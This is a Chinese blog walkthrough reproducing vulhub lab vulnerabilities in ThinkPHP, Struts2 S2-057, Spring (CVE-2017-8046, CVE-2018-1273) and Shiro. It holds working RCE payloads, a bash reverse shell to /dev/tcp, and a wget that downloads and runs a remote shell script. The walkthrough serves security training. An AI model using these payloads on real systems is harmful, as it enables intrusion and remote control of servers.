环境
使用Debian虚拟机,配置docker与docker-compose
apt install docker.io
apt install docker-compose
配置后下载vulhub靶场
git clone https://github.com/vulhub/vulhub.git
后发现,环境还是无法启动成功,重新打开终端输入docker hub加速服务
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<EOF
{
"registry-mirrors": [
"https://docker.anyhub.us.kg",
"https://dockerhub.icu",
"https://docker.awsl9527.cn"
]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker
如图成功后,启动容器 ,成功
若想更改端口,则vim docker-compose.yml进入更改
Thinkphp
进入vulhub/thinkphp/5-rce目录下,docker-compose up -d 启动环境,访问(默认端口8080)
方法一
拼接路径,查看用户
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
将system替换为phpinfo,whoami替换为-1,打开探针
拼接,生成木马获取shell(演示使用探针演示),文件在根目录下,访问
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php
方法二
利用工具获取shell,利用蓝鲸thinkphp工具扫描,发现存在漏洞
选择漏洞查看命令是否能执行(第一个与第三个不支持命令)
自己写入木马后,点击getshell后,使用蚁剑测试连接(默认的木马没连上)
struts2(Apache)
S2-057远程执行代码漏洞
进入vulhub/struts2/s2-057目录下,docker-compose up -d 启动环境,拼接/struts2-showcase访问
拼接访问/struts2-showcase/${(123+123)}/actionChain1.action
刷新后可以看到中间实在位置相加了,刷新页面抓包,发送到重放器
将register2改为actionChain1发送,查看响应为302
然后将数字位置改为如下,发送,出现root
%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d
Spring
Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)
进入vulhub/spring/CVE-2017-8046目录下,docker-compose up -d 启动环境,拼接路径/customers/1访问,刷新使用BP抓包
将抓包文件换为以下,更换为自己的ip与端口,放完包
PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193
[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]
查看开启环境的机器,查看docker开启镜像id
docker ps
使用以下两条命令,发现success
docker exec -it c9a1b028f320 /bin/bash
ls /tmp
spring代码执行(CVE-2018-1273)
进入vulhub/spring/CVE-2018-1273目录下,docker-compose up -d 启动环境,拼接路径/users访问,随便输入用户名密码后使用BP抓包
将下面替换为以下,在重放器发送,显示500,并且id显示created创建成功
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=
如上一个CVE-2017-8046一样返回靶场查看,zcc文件已创建
物理机www下写下反弹shell脚本ip为监听机器ip,port为监听端口
bash -i >& /dev/tcp/ip/port 0>&1
将抓包中touch /tmp/zcc改为以下(写下脚本的目录),发送成功
/usr/bin/wget -qO /tmp/shell.sh http://ip/111.sh
查看靶场文件是否写入,写入成功
物理机使用工具开启端口监听
BP中再更改命令为打开文件(如下),还是touch /tmp/zcc位置,发送
/bin/bash /tmp/shell.sh
监听成功
Shiro
进入vulhub/shiro/CVE-2016-4437目录下,docker-compose up -d 启动环境,访问
先验证Shiro框架(Shiro框架特征:响应包中存在字段set-Cookie: rememberMe=deleteMe)
使用BP抓包,添加字段,在重放器发送,发现响应包中存在set-Cookie: rememberMe=deleteMe
Cookie: rememberMe=123
使用shiro反序列化工具,填入地址,点击检测当前密钥,发现存在shiro框架
点击爆破密钥,得到密钥
点击检测当前利用链,得到利用链(若未得到爆破利用链)
来到命令执行,输入whoami执行,得到用户名
来到内存马,生成木马(注意:密码为字母与数字),打开哥斯拉测试连接(将asp改为jsp),成功
此次漏洞复现完毕,欢迎指出错误和讨论
版权归原作者 Jhin-Askeladd 所有, 如有侵权,请联系我们删除。